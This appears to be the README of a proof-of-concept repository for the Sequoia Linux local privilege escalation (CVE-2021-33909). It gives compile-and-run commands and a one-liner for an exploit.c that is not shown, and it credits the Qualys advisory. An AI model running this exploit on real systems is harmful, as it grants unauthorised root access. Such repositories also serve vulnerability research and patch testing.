Sequoia exploit (7/20/21)# Sequoia (CVE-2021-33909)
## Building
```shell
gcc exploit.c -o exploit
```
## Running
```shell
chmod +x exploit
./exploit
```
## One-Liner
```shell
gcc exploit.c -o exploit;chmod +x exploit;./exploit
```
## Credits
https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909
[4.0K] /data/pocs/1ac91ef0f27f44083f4466ee504f21c034162320
├── [6.5K] exploit.c
└── [ 377] README.md
0 directories, 2 files